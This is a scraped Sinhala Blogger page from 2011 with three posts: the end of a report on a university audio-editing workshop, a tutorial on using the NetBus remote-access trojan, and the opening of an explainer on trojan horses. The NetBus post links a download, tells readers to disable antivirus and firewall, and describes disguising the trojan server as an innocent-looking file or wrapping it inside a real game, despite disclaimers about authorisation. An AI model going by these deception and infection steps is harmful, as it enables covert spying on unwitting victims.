href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9KeourUl7ZDeCI2hku9dDHoF9wWQV6fQ9D8669IGxVyj-dwtrVkIK5dS_ybhNBUq6LHKotq-q0gkaE_K9sY0EwzzG_-KzzIN_JvP4h5obwAcloD_trttyv2C_AVmPZkbjUrePJ8uSGyk/s1600/2011-10-05+13.37.16.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9KeourUl7ZDeCI2hku9dDHoF9wWQV6fQ9D8669IGxVyj-dwtrVkIK5dS_ybhNBUq6LHKotq-q0gkaE_K9sY0EwzzG_-KzzIN_JvP4h5obwAcloD_trttyv2C_AVmPZkbjUrePJ8uSGyk/s400/2011-10-05+13.37.16.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661937623617306754" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div><br /></div><div style="text-align: left;">දේශනයේදී ප්රශ්ණ ඇසීමට අවස්ථාවක් ලබා දෙන්නට කාල වේලාව නොතිබූ නිසා ප්රශ්ණ නිරාකරණයත් මේ සැසිවාරයේදීම සිදු කළා.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMSD_wvgUayCz03YUdjG8p6Qx3g2oYXxCnJaMJtEC1xPir7oSIr9TQJFpS3n_GQeVGGXNT-q9YAz0F9ZH_v67YQz4nq50BrBFYPA3o0Mx0gVfgxV_esu8yAEA-MMdm0mMdePi9nAcAfok/s1600/17.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMSD_wvgUayCz03YUdjG8p6Qx3g2oYXxCnJaMJtEC1xPir7oSIr9TQJFpS3n_GQeVGGXNT-q9YAz0F9ZH_v67YQz4nq50BrBFYPA3o0Mx0gVfgxV_esu8yAEA-MMdm0mMdePi9nAcAfok/s400/17.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661939455599110898" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div style="text-align: center;"><br /></div><div style="text-align: left;">විවිධ ශ්රව්ය සංස්කරණ උපක්රම හා විධි රාශියක් මෙහිදී ඔවුන් හට ප්රායෝගිකව උගන්වනු ලැබුවා</div><div style="text-align: left;">.</div><div style="text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhppRSfDOK0co2pRaXjUUIfq1VYRLnQPea6PquH_04yLQmVAuY3aDTJIh8BU6ZmUUmOLEvt8eV5zfteHgpolGVpbU3ssM1KN1bLsfHIbiTAz1znygBDM4kWC9xsqoFup1taFQR3rVEq-ts/s1600/2011-10-05+15.41.11.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhppRSfDOK0co2pRaXjUUIfq1VYRLnQPea6PquH_04yLQmVAuY3aDTJIh8BU6ZmUUmOLEvt8eV5zfteHgpolGVpbU3ssM1KN1bLsfHIbiTAz1znygBDM4kWC9xsqoFup1taFQR3rVEq-ts/s400/2011-10-05+15.41.11.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661937633754763938" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div><br /></div><div style="text-align: left;">වඩාත්ම සතුටුවිය හැකි කාරණයනම් මෙයට සහභාගී වූ හැම කෙනෙක්ම වැඩමුළුව අවසානයේ තමන් විසින්ම නව ශ්රව්ය නිර්මාණයක් ලබා දී තිබූ ශ්රව්ය කොටස් සංස්කරණය කිරීමෙන් නිර්මාණය කර තිබීමයි. මම ඒ හැම කෙනක් ගාවටම ගිහින් පුද්ගලිකවම ඒ සියළුම නිර්මාණ රස වින්දා.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifyJ2x9muRflgjADmXqrxUNzk4d5MXGlxnMAd-vvA_uKjNAceP5cl_ovQ-mrePQpVLNe5FxKq22m0fCTNle6bQjAhiwfZroHDkhMBMOjegODoPEKsLePMebiiJPOFbRwLZxesu2nziAc4/s1600/20.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifyJ2x9muRflgjADmXqrxUNzk4d5MXGlxnMAd-vvA_uKjNAceP5cl_ovQ-mrePQpVLNe5FxKq22m0fCTNle6bQjAhiwfZroHDkhMBMOjegODoPEKsLePMebiiJPOFbRwLZxesu2nziAc4/s400/20.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661939461055408674" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 300px; height: 400px; " /></a></div><div><br /></div><div>ලබා දීපු දැනුම ඒ අවස්ථාවේදීම ප්රායෝගිකව භාවිත කර අලුත් යමක් ඔවුන් නිර්මාණය කර තිබීම ඉතාමත් සතුටක් ඇති කළා. </div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVUlZZpSda-lh19Kgww82iJl5GXLR5f_lJ9HwnypPsFjEGa_DK_etX2arZsh8MLUiTNbmlGDX0K2QeyFI5v7_SO6YTZg6MJO7g1EI9WCUa579e3sbFiiMkEYHRsq_mWcTEbJjkouBexFA/s1600/15.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVUlZZpSda-lh19Kgww82iJl5GXLR5f_lJ9HwnypPsFjEGa_DK_etX2arZsh8MLUiTNbmlGDX0K2QeyFI5v7_SO6YTZg6MJO7g1EI9WCUa579e3sbFiiMkEYHRsq_mWcTEbJjkouBexFA/s400/15.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661939454398306770" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></a></div><div><br /></div><div>ඔවුන් සියළු දෙනාගේම නිර්මාණ ඒ ඒ පුද්ගලයාගේ රසවින්දනය මත පදනම් වෙලා නිර්මාණය වෙලා තිබුණ නිසා. ලස්සන එකිනෙකට වෙනස් නිර්මාණ රාශියක් උණු උණුවේම රස විදින්නට මටත් මගේ සහෝදර වරුන්ටත් හැකි උනා. </div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZZ_V405bSZb7yOtDTSMNDoZX4k_7hSdKtd5avhtmwrkFTK4xWqD08TYSi0Pi9Ct5dru05FHb9fOq9yD_KNkFmUBRqeUljjjNJN2HOyC8l77NDNZVRdRcRPNZex752wieOkHpngNztGGc/s1600/19.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZZ_V405bSZb7yOtDTSMNDoZX4k_7hSdKtd5avhtmwrkFTK4xWqD08TYSi0Pi9Ct5dru05FHb9fOq9yD_KNkFmUBRqeUljjjNJN2HOyC8l77NDNZVRdRcRPNZex752wieOkHpngNztGGc/s400/19.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5661939459610718434" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 300px; height: 400px; " /></a></div><div><br /></div><div> </div><div>තමන්ගෙ නිර්මාණය ඒ වෙලේම බලල අගයනකොට හැම කෙනෙක්ගෙම මූණෙ ඇදුන සතුට වැඩමුළුවෙන් ඔවුන් තෘප්තිමත් වූ ආකාරය මැනවින් කියා පෑවා. ඒ විතරක් නෙමෙයි ඔවුන්ගේ සතුට ෆීඩ් බැක් වලිනුත් කියා පාලා තිඹුණා</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLUK_kG1RQzdKT0VLcKDlLhcJxiMKeS1cUFNGQuDCTqFkypiF64XJs6WJnN1iyGdROQWwyJ5k8PM1y7DDr3asU8A_-pyQBP8nygZJi4DBjO3oR5KOw2mHh2aDcynqSGgTEhWdGIKwRZ5s/s1600/comments6.JPG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLUK_kG1RQzdKT0VLcKDlLhcJxiMKeS1cUFNGQuDCTqFkypiF64XJs6WJnN1iyGdROQWwyJ5k8PM1y7DDr3asU8A_-pyQBP8nygZJi4DBjO3oR5KOw2mHh2aDcynqSGgTEhWdGIKwRZ5s/s400/comments6.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5661943896118403874" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 120px; " /></a></div><div><br /></div><div>මේ විදිහට බොහොම සාර්තකව වැඩමුළුව නිමාවක් දුටුවෙ සවස පහත් පහු වෙලා. සියල්ලෝම ඉතාමත් සතුටෙන් තමයි පිටවෙලා ගියෙ. </div><div><br /></div><div>UCSC සිසුන් විදිහට අපි හැමදාමත් සමාජයට වැදගත් දේවල් සිදු කළා. IFO++ ප්රදර්ශනය එයට එක් හොඳ උදාහරණයක් (ශ්රි ලංකාවේ පැවැත්වූ පළමු ICT ප්රදර්ශණය). මේ විදිහටම අපේ ජූනියර් මල්ලිලා හා නංගිලා මේවා දිගටම පවත්වාගෙන යයි කියල අපි දන්නවා. ඒ නිසා UCSC එකෙන් දිගටම සමාජයට වැදගත් දේවල් ඉදිරියේදී (අපි තව ටික කාලයකින් උපාදිය ගෙන ඉවත්ව ගියත්) බලාපොරොත්තු වෙන්න පුළුවන්. </div><div><br /></div><div>මට කිසිම පින්තූරයක් ගැනීමට නොහැකි උන නිසා පින්තූර ලබා දීම ගැන සංජය සොයුරාට හා මාධව සොයුරාට ස්තුති වන්ත වෙනවා.</div><div><br /></div><div>මේ ගැන ඔවුන් දෙපලත් ලිපි ලියා තියෙනවා. මාධවගේ ලිපිය <a href="http://blog.madhawaonline.com/2011/10/08/%E0%B6%85%E0%B6%AD%E0%B7%92%E0%B7%83%E0%B7%8F%E0%B6%BB%E0%B7%8A%E0%B6%AE%E0%B6%9A-%E0%B7%80%E0%B7%90%E0%B6%A9%E0%B6%B8%E0%B7%94%E0%B6%BD%E0%B7%94%E0%B7%80%E0%B6%9A-%E0%B6%85%E0%B7%80%E0%B7%83%E0%B7%8F/#comment-226">මෙතනිනුත්</a>, සංජයගේ ලිපිය <a href="http://blog.sanjaya.me/media-editing-workshop-ends-successfully-behind-the-scene/#comment-674">මෙතනිනුත් </a>බලන්න පුළුවන්.</div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com5tag:blogger.com,1999:blog-7802132138133841506.post-54824598622657149112011-10-01T10:23:00.000-07:002011-10-01T15:03:50.933-07:00ට්රෝජන් අශ්වයෙක් පරිඝනකයකට දක්කන්න!!<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGUXnZbneKp9w2u3l-ULEifIqcGKRusaiLGxev9d73e6o9n8SQ-SsNWToeeOx9FHGKL8TwarfFd4cSJHW6js7SK2szqSxuGv21KMr78eIuW6HLzYN5t2haBOisTvEzmxLQsXQX76L6WxU/s1600/hacker.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 284px; height: 243px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGUXnZbneKp9w2u3l-ULEifIqcGKRusaiLGxev9d73e6o9n8SQ-SsNWToeeOx9FHGKL8TwarfFd4cSJHW6js7SK2szqSxuGv21KMr78eIuW6HLzYN5t2haBOisTvEzmxLQsXQX76L6WxU/s400/hacker.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5658584951736700178" /></a></div><br /><div style="text-align: left;">මේ ලිපියෙන් මම අද කියන්න යන්නෙ කොහොමද ට්රෝජන් අශ්වයෙක් වෙනත් පරිඝනකයකට යවල. ඒ ට්රෝජන් අශ්වය ලවා අදාල පරිඝනකත් එක්ක සෙල්ලම් කරන්නෙ කියල. ට්රෝජන් අශ්වයන්ගෙ ක්රියා කාරීත්වය ගැන මම සවිතරාත්මක ලිපියක් කලින් ලියපු නිසා මේ ලිපියෙන් මම ඒ ගැන කියන්න යන්නෙ නෑ. කියවපු නැති කෙනෙක් ඉන්නවනම් <a href="http://compdiary.blogspot.com/2011/10/blog-post.html">මෙතනින් </a>ගිහින් ඒකත් කියවලම එන්න.</div><div><br /></div><div>මම පහුගිය ලිපියෙන් පැහැදිලි කළා අපිට පහසුවෙන් භාවිත කරන්න පුළුවන් ට්රෝජන් අශ්ව මෘදුකාංග තියෙනවා කියන එක. මම ඒ වගේ මෘදුකාංග කීපයක නම් පහතින් සඳහන් කරන්නම්,</div><div><ul><li>Tini</li><li>Netcat</li><li>SubSeven</li><li>Back Orifice 2000</li><li>NetBus </li></ul><div>මෙතන තියෙන මෘදුකාංග වලින් NetBus කියන ට්රෝජන් අශ්වයා භාවිත කරන ආකාරය තමයි මම අද කියන්න යන්නෙ. ඊට කලින් අනිවාර්යයෙන් සඳහන් කරන්න ඕනි ට්රෝජන් අශ්වයෙක් වෙනත් අයෙකුගේ පරිඝනයකට හෝ පරිඝනක පද්ධතියට යවල හැක් කරන එක නීති විරෝදී කියන එක. ඒ නිසා ට්රෝජන් අශ්වයෙක් යවන්න කලින් ඒ පුද්ගලයා හෝ ආයතනය දැනුවත් කරල අනුමැතිය ලබා ගැනීම වැදගත්. </div></div><div><br /></div><div>ඒ වගේම ඔබට ඔබේ පරිඝනකය හෝ පරිඝනක පද්ධතිය ට්රෝජන් අශ්ව ප්රහාර වලට මුහුණ දෙන්නෙ කොහොමද කියල දැන ගන්නත් ඒ වගේ ප්රහාරයක් කිරීමෙන් දැන ගන්න පුළුවන්.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHmpTnlIO0c1ktOrbqQBHqkT_esq3oI7LqqqamdYWtUZy_4ucs-Tm7p9g26RnxQqqcxbelibCQXxLn0tiz73CdQxTHzGctKePi3SEsmYhR6Ak8anIcH2Lc1TEZHClD505xzPRlga6gZ6c/s1600/black_hat.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHmpTnlIO0c1ktOrbqQBHqkT_esq3oI7LqqqamdYWtUZy_4ucs-Tm7p9g26RnxQqqcxbelibCQXxLn0tiz73CdQxTHzGctKePi3SEsmYhR6Ak8anIcH2Lc1TEZHClD505xzPRlga6gZ6c/s400/black_hat.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5658585120539993202" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 350px; height: 350px; " /></a></div><div><br /></div><div>මම මාතෘකාවට දක්කනව වගේ වචනයක් දැම්මට ට්රෝජන් අශ්වයන් යැවීම ප්රහාරයක් (Attack) හා යවන්නා ප්රහාරකයෙක් (Attacker) විදිහට තමයි සැලකෙන්නෙ. ඒ නිසා දැනුමට හා විනෝදයක් ලබන්න ප්රහාරය අනුමැතිය සහිතව (මේකත් ලිඛිත වන්න ඕනි) කරන්න කියල මම ඉල්ලා සිටිනවා. මොකද මෙයින් ලබා ගන්නා දැනුමකින් ඔබ කරන ක්රියා සම්බන්ධයෙන් වගකීමක් මට නැහැ.</div><div><br /></div><div>බය කළා ඇතිනෙ, දැන් වැඩේට බහිමු. මම කලින් කිව්වා මම ඔබට පාවිච්චි කරන්න කියල දෙන්නෙ NetBus කියන ට්රෝජන් අශ්ව මෘදුකාංගය කියල. මේ මෘදුකාංගය ඉතාමත් ප්රසිද්ධ ට්රෝජන් අශ්ව මෘදුකාංගයක්. ඉස්සෙල්ලම මෘදුකාංගය <a href="http://www.megaupload.com/?d=L56EGXVD">මෙතනින් </a>ගිහින් භාගත කරන්න. භාගත කරන්න කලින් ඉස්සෙල්ලම Virus Guard හා Fire Wall අක්රීය (Disable) කරන්න. </div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGNsC6IPMlIMK1QXgpS3OZEzEKZYb9Eg3OQxzinoX17PVnoVuUtlEq6ZYuMznYzXrmoOagn4B58LTabhJQZ9f8RLKs_wyFpz8K8BKSU1BFzWsaAwK7uL7eomk5cRbQ9NNmnWBJGYoK32E/s1600/hack+trojan+net+bus.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGNsC6IPMlIMK1QXgpS3OZEzEKZYb9Eg3OQxzinoX17PVnoVuUtlEq6ZYuMznYzXrmoOagn4B58LTabhJQZ9f8RLKs_wyFpz8K8BKSU1BFzWsaAwK7uL7eomk5cRbQ9NNmnWBJGYoK32E/s400/hack+trojan+net+bus.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5658582982306202562" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 245px; " /></a></div><div><br /></div><div>හැම ට්රෝජන් අශ්වයෙක් වගේම NetBus ටත් ප්රධාන කොටස් දෙකක් තියෙනවා. ඒ තමයි,</div><div><ol><li>Client </li><li>Server</li></ol><div>මෙතනින් සර්වර් ෆයිල් එක තමයි ට්රෝජන් අශ්වයාට ගොදුරු වෙනාගෙ පරිඝනකයේ ස්ථාපනය කරන්නෙ. Client එකෙන් තමයි අපි හැක් කරන්නෙ. හැක් කරන ආකාරය දැන ගන්න කලින් අපි බලමු නෙට්බසය පාවිච්චි කරල වෙනත් පරිඝනකයකට ඔබේ පරිඝනයකේ ඉඳන් මොනවාද කරන්න පුළුවන් කියලා,</div></div><div><ul><li>CD/DVD-ROM ඇරීම හා වැසීම</li><li>BMP/JPG පින්තූර දිස් වීමට සැලැස්වීම</li><li>මූසිකයයේ (Mouse)බොත්තම් (Button) වල වම දකුණ මාරු කිරීම</li><li>වෙනත් වැඩසටහන් ආරම්භ කිරීම</li><li>WAV ගොනු ධාවනය කිරීම</li><li>මූසිකය පාලනය කිරීම</li><li>විවිධාකාරයේ පණිවුඩ දිස් වීමට සැලැස්වීම</li><li>වින්ඩෝස් මෙහෙයුම් පද්ධතිය (OS) වැසීම (Shut Down)</li><li>ගොනු(Files) Download/Upload/Delete කිරීම</li><li>Keystrokes යැවීම සහ යතුරු (Keys) අත්හිටුවීම (Disable)</li><li>විකල්ප URL එකකට යැවීම</li><li>Keystrokes ග්රහණය කර ගැනීම</li><li>Screendump ගැනීම</li><li>පරිඝනකයේ ශබ්දය අඩු වැඩි කිරීම</li><li>පරිඝනකයේ මයික්රෆෝනයෙන් ශබ්ද පටිගත කිරීම</li></ul><div>වැනි විවිධාකාර දේවල් රාශියක් NetBus ට්රෝජන් අශ්වයාට කරන්න පුළුවන්.</div></div><div><br /></div><div>මෙය භාවිතයෙන් හැක් කිරීමේදී වඩාත් වැදගත් වෙන්නෙ ඔබේ ගොදුරට (Victim) සර්වර් ෆයිල් එක ඔහුගේ පරිඝනකය තුල ස්ථාපනය කර වීමයි. ඔබ අද්යාපනික අරමුණකින් කරනවානම් ගොදුරගෙ අනුමැතිය ඇතුවම මේක ස්තාපනය කරන්න පුලුවන් බොහොම ලේසියෙන් නමුත් හැක් කරනකොට එහෙම අනුමැතිය ලැබෙන්නෙ නෑ. ඉතින් මේ සඳහා හැකර්ලා විවිධ ආකාර පාවිච්චි කරනවා. ඔබගේ දැන ගැනීමට මම ඒ ආකරයක් දෙකක් පැහැදිලි කරන්නම්. </div><div><br /></div><div>අපිට පුළුවන් මේ ට්රෝජන් අශ්වයා වෙනත් නමකින් නම් කරන්න. ඒ කියන්නෙ දකින්නාට හිතෙනවා මේක වෙන දෙයක් කියල. උදාහරණයකට අපිට පුළුවන් ඒක Beauty_of_Sri_Lanka.exe වගේ නමකින් නම් කරන්න. දැක්කම අපිට හිතෙනවා මේක මොකක් හරි ලංකාවෙ සොබා දම වගේ දෙයක් ගැන අදාල මොකක් හරි කියල. එහෙම හිතල ඒක ධාවනය කරනවා. එතකොට කිසිම දෙයක් වුන බවක් ගොදුරට පෙනෙන්නෙ. නමුත් ඔහු ඒක ධාවනය කරපු ගමන් ඔහුට නොපෙනී ට්රෝජන් අශ්වයා පරිඝනකය තුල ස්තාපනය වෙනවා. එක්කො මේක ගේම් එකක් විදිහට නම් කරන්න පුළුවන් Bubble.exe හෝ PacMan.exe වගේ. මෙතනදි අපි බලාපොරොත්තු වෙන්නෙ ඉහල අවස්ථාවෙ වගේම හොඳ ගේම් එකක් නමුත් ධාවනය කරපුවාම කිසිම දෙයක් වෙන්නෙ නෑ ඉතින් අපිත් දෙතුන් සැරයක් රන් කරල අතෑරල දානවා නමුත් අපිට නොපෙනීම අපි විසින්ම ට්රෝජන් අශ්වයා අපේ පරිඝනකයට රිංගලා. ඒකයි මේකට ට්රෝජන් අශ්වයා කියන්නෙ මම ඒ ගැන <a href="http://compdiary.blogspot.com/2011/10/blog-post.html">කලින් ලිපියෙ</a> කිව්වා. මේ විදිහට කී සැරයක් ඔයාලත් රන් කරපුහාම මොකවත් නොවුන ෆයිල් රන් කරලා තියෙනවාද?</div><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ16OD4cM25N_xp2ZdCBt5mFp98xcN_QHdqkkmq9PGnz4rB_3GIFYf9TVKJHv44r_vee5aoey0viYZ2L8Jie44cfnW_nxhQgBgvkQcJKrzzSwirK4zFU776PCT-IHu7nDLuwrv65GlMqI/s400/TrojanHorse.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5658620396552352274" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 387px; height: 362px; " /></span></div><div><br /></div><div>ඒ වගේම හැකර්ලා තවත් ආකාරයක් භාවිතා කරනවා. ඒ තමයි Wrapper එකක් අනුසාරයෙන් ට්රෝජන් අශ්වයා ඇත්තටම වැඩ කරන වැඩසටහනකට එතීම. උදාහරණයක් විදිහට ඇත්තටම වැඩ කරන හැමෝම ආස චෙස් ගේම් එකක් තියෙනවා Chess.exe කියලා. ඒකෙ ගොනුවේ ප්රමාණය (File Size) 500KB කියල හිතමුකො. හැකර් කරන්නෙ Wrapper වැඩසටහනක් ආධාරයෙන් ට්රෝජන් අශ්වයාවත් (මෙයත් exe ෆයිල් එකක්ම තමයි) Chess.exe එකටම එතීම හෙවත් සැඟවීම එතකොට ෆයිල් එක 600KB විතර වෙනවා. එතකොට ඔබ අර ගේම් එක ස්තාපනය කරපුවාම ඇත්තටම ගේම් එක ස්තාපනය වෙනවා (ඒක අපිට සෙල්ලම් කරන්නත් පුළුවන්) ඒත් එක්කම ඒකෙ හංගල එවපු ට්රෝජන් අශ්වයාත් ස්තාපනය වෙනවා. කොටින්ම අපි එක exe ෆයිල් එකක් රන් (Run) කරනකොට ඇත්තටම දෙකක් රන් වෙලා. ඇත්තටම ට්රෝජන් අශ්වයා කියන්නෙ වෙනත් වේශයකින් එන පහරදීමක්. අපිම තමයි නොදැනුවත්ව පහර දීම පාවඩ දාල පිලිගන්නෙත්. ඇත්තටම අර <a href="http://en.wikipedia.org/wiki/Trojan_War">තුසර පුර සංග්රාමයේදි</a> උනා වගේ.</div><div><br /></div><div>මෙහෙම ස්තාපනය උන ගොදුරු පරිඝනකය අන්තර්ජාලයට හෝ LAN එකට සම්බන්ද උන ගමන් පහර දෙන්නාට පුළුවන් අර උඩ තියෙන වින්ඩෝව් එකෙ තියෙන දේවල් කරන්න. ඒවා කරන ආකාරය හොඳට පෙන්වන වීඩියෝවක් මට හම්බ උනා. ඒකෙන් බලල ඉතිරි ටික කර ගන්න එක කජු කනව වගේ තමයි. මම ඔයාලට දුන්න NetBus ට්රෝජන් අශ්වයා හොඳට වැඩ. මම මේක ලියන්න කලියෙන් ඒක මගේ ගෙදර තියෙන LAN එකට සම්බන්ධ අනිත් පරිඝනකයකට දාල ටෙස්ට් කලා. මම ආසම CD-ROM වැඩේට ඒක හරිම අත්බූත බවක් දෙනව නිකන්ම එක ඇරෙන වැහෙන එක. ඔය යටින් තියෙන වීඩියෝව බලල ඉතුරු හරිය කරන්න.</div><div><br /></div><div style="text-align: center;"><iframe width="420" height="315" src="http://www.youtube.com/embed/HHpyGQE0GBc" frameborder="0" allowfullscreen=""></iframe></div><div><br /></div><div><i><br /></i></div><div><i>මේ ලිපියේ අඩංගු සියලුම කරුණූ අධ්යාපනික අරමුණකින් ප්රදර්ශනය සඳහා පමණක් පල කළ ඒවා බව සලකන්න. </i></div><div><i><br /></i></div><div><i>All content of this post are only for demonstration purpose and do not try this without a proper authorization document form the potential victim.</i></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com5tag:blogger.com,1999:blog-7802132138133841506.post-41603257516625904782011-10-01T05:01:00.000-07:002012-01-10T10:02:44.251-08:00පරිඝනකයට පනින ට්රෝජන් අශ්වයෝ!!<div style="text-align: left; ">ට්රෝජන් අශ්වයෙක් (Trojan Horse) කියන්නෙ ඔබේ අනුමැතිය නොමැතිව හෝ ඔබ නොදැන ඔබේ පරිඝනකය තුල ක්රියාත්මක වන මෘදුකාංගයක්. මෙහි විශේෂත්වය තමයි මෙය ඔබේ පරිඝනකයට හදුන්වා දෙන්නෙ එහි ඇත්ත තත්වය සඟවල. උදාහරණයක් විදිහට ඔබට වෙබ් අඩවියකින් නොමිලයේ ලස්සන ස්ක්රීන් සර්වරයක් (Screen Server) ලබා දෙනවා. ඔබ එය බාගත කරගෙන ස්තාපනය කරගන්නවා. පිටතින් එය ලස්සන ස්ක්රීන් සර්වරයක් උනාට එය ඇතුලත පවතින්නෙ විනාශකාරී මෘදුකාංගයක්.</div><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRC_fHw95P0k0W54uhMh1MEtaUH6CVvW756Th6E1eht6RjrOfK_VIsEvWBBCQX0nBiL5B22E9_bU2N1Gqa9Wu143eywBF7BdgxnS8-9ACXCbjPcQI_g0md0ed-XPjfhEt1ITfcTK25BOs/s400/TrojanHorseMythImage.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5658207148833479202" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 266px; " /></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><br /></span></div><div>ට්රෝජන් අශ්වයා කියන විශේෂිත නාමය මෙයට ලැබිල තියෙන්නෙත් ඒ නිසාමයි. ග්රීක මහා කවි <a href="http://en.wikipedia.org/wiki/Homer">හෝමර් </a>විසින් ලියනු ලැබූ <a href="http://en.wikipedia.org/wiki/Trojan_War">තුසරපුර සංග්රාමයේ</a> එන සිදුවීමක් තමයි විශාල දැව අශ්වයෙක් ඇතුලෙ සෙබලු සඟවල සතුරු නගරයට යවපු එක. සතුරු නගර වැසියෝ කලේ එය තෑග්ගක් විදිහට සලකල වසර දහයකට ආසන්න කාලයක් පැවති සංග්රාමයෙන් ඔවුන්ව ආරක්ශා කරපු විශාල පවුර බිඳ දමල අර ඇතුලෙ හංගල හිටිය සෙබලුත් එක්කම ලී අශ්වය නගරය ඇතුලට ගත්ත එක. ඊට පස්සෙ උන දේ අමුතුවෙන් කියන්න ඕනි නෑනෙ. ඕකට අපේ සමාජයේ කතාවක් තියෙනවා "අහක යන නයි රෙද්ද අස්සෙ දාගෙන කෑවෝ කෑවෝ කියල කෑගහනවා" කියල. මම මෙහෙම කෙටියෙන් කිව්වට මේ <a href="http://en.wikipedia.org/wiki/Iliad">ග්රීක කතන්දරය</a> ඉතාමත් දිග ලස්සන කතාවක් එහිම පසු කතාව වන <a href="http://en.wikipedia.org/wiki/Odyssey">ඔඩිසියස්</a> කියන කතාවත් හරිම ලස්සනයි. දෙකම සිංහලට පරිවර්තනය වෙලා තියෙනවා.</div><div><br /></div><div>ට්රෝජන් අශ්වයෙක් පරිඝනකයට විවිද අරමුණු මුල් කරගෙන හදුන්වා දෙනු ලබන්න පුළුවන්. ප්රධාන වශයෙන් ට්රෝජන් අශ්වයන් හදුන්වා දෙනු ලබන්නෙ තොරතුරු සොරා ගැනීමට හෝ පරිඝනකය විනාශ කිරීම සඳහායි.</div><div><br /></div><div>ට්රෝජන් අශ්වයෙක් පිටුපස සෑම විටම පහර දෙන්නෙක් සිටිනවා. ට්රෝජන් අශ්වයා සහිත පරිඝනකය අන්තර්ජාල සම්බන්දතාවය ලබා ගත්ත ගමන්ම පහර දෙන්නාට ඔහුගේ පහර දීම කරන්න අවශ්ය ඉඩකඩ සෑදෙනවා.</div><div><br /></div><div><b>ට්රෝජන් අශ්ව ප්රභේද :-</b></div><div><ul><li>මුරපද ග්රහණය/යැවීම (Password Sending/Capturing)</li><li>FTP Trojans</li><li>Key Stroke Captures (මෙමගින් යතුරු පුවරුවේ ලියනය කරන හැම 